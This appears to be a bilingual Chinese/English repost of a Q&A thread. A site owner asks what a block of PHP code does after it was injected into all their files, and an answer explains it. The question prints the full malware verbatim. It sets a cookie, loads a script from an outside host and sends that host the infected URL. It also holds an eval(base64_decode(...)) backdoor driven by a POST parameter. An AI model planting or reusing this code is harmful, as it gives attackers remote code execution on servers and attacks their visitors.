有黑客 - 任何人都知道这个PHP代码是什么？ [英] Got Hacked - Anyone know what this PHP Code Does?

问题描述

我们的服务器通过一些SQL注入方法（现在修补）被黑客入侵。我们的所有PHP文件都将这个文件添加到每个文件的顶部。

Our server got hacked via some SQL Injection method (now patched). All our PHP files got this added to the very top of each file.

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

它似乎设置一个cookie，但我没有第一个想法是什么。

It seems to set a cookie but I don't have the first idea what it does.

任何专家能够理解这是什么，以及潜在的创建的Cookie名称可能看起来像我可以告诉任何用户等

Any experts able to understand what this does and potentially what the Cookie Name that is created may look like so I can tell any users etc

UPDATE
查看该漏洞是由于Zenphoto Gallery软件中名为Tiny_MCE的插件。

UPDATE Seen the exploit was due to a plugin in the Zenphoto Gallery Software called Tiny_MCE.

推荐答案

首先它设置一个cookie。 （名为lb11）为值102。

First it sets a cookie. (named lb11) to the value 102.

如果它（以后？）找到cookie，它将cookie设置为随机值
在1000和9000之间，所以它不再这样做：有用户
请求（和执行）一个javascript，它发送哪个被感染的
URL调用，然后刷新页面，所以什么都不显示to
发生在javascript运行后。

If it (later?) finds the cookie, it sets the cookie to a random value between 1000 and 9000, so that it doesn't do this again: Has the user request (and execute) a javascript, which sends which which infected URL made the call, and then refresh the page, (so nothing appears to have happened after the javascript has run.

但是在任何情况下，如果showimg参数被传递到页面，它
查看该页面的内容，并在服务器上执行它。

But in any case, if the "showimg" parameter is passed to the page, it looks at the content of that page, and executes it on the server.

因此，如果此代码存在， ，（它还通知服务器哪个URL被感染，然后让该人在受感染的服务器上运行任意代码（通过showimg参数）。

So, If this code is present, it will run javascript, (which also informs the server which URL is infected, and then let the person run arbitrary code (via the showimg parameter) on the infected server.

这有2层的攻击，它可以用javascript攻击客户端，然后可以攻击服务器并对其运行任意代码。

This has 2 layers of attacks, it can attack the client with javascript, and can later attack the server and run arbitrary code on it.

这篇关于有黑客 - 任何人都知道这个PHP代码是什么？的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！